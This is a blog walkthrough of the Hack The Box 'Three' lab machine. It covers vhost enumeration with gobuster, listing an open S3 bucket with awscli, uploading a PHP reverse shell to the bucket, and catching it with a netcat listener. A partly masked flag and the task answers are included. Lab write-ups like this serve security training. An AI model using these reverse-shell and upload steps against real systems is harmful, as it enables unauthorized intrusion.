Open in app

Sign in

Write

Sign in

Three HTB (write up) : walk through

Eazy_web
3 min readFeb 7, 2023

--

STARTING POINT

Learn the basics of Penetration Testing

start the machine by downloading a openvpn file that provide by the Htb

sudo openvpn <file>.ovpn

Task 1 :

How many TCP ports are open?

Answer :

2

Task 2 :

What is the domain of the email address provided in the “Contact” section of the website?

let find the domain in the website

answer :

thetoppers.htb

Task 3:

In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

follow this command to add the host

echo "IP thetoppers.htb" >> /etc/hosts

answer :

/etc/hosts

Task 4:

Which sub-domain is discovered during further enumeration?

follow this command in the terminal and get a result


 gobuster vhost -u http://thetoppers.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain

answer :

s3.thetoppers.htb

Task 5 :

Which service is running on the discovered sub-domain?

amazon s3

Task 6 :

Which command line utility can be used to interact with the service running on the discovered sub-domain?

awscli

Task 7 :

Which command is used to set up the AWS CLI installation?

aws configure

Task 8 :

What is the command used by the above utility to list all of the S3 buckets?

aws s3 ls

Task 9 :

This server is configured to run files written in what web scripting language?

php

Submit Flag

use this command to get the what are the files in the s3.amazon storage cloud

 aws --endpoint=http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb

create the php reverse shell in the attacker machine

there some reverse shell in the kali machine

to get the ip follow this command

ifconfig

see the your system IP that given by the hackthebox while connect the openvpn in the machine

edit the ip that assign by the hackthebox

after that

use an following commend the and uploads to the victim machine

aws --endpoint=http://s3.thetoppers.htb/ s3 cp shell.php s3://thetoppers.htb

after uploading the shell

use the netcat to the reverse shell

nc -nlvp "port number"

after the reverse shell of the victim machine enjoy with the flag

Submit root flag

a980d99281a******************

#hackthebox #threewriteup

Hackthebox Writeup
Hackthebox Walkthrough
Htb Writeup
Htb Walkthrough

--

--

Eazy_web
Eazy_web

Written by Eazy_web

4 Followers
7 Following

Welcome to Eazy web! I delve into Blue Team and Red Team strategies offering teaching and growth tips. Join me to explore travel, financial management, and more

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams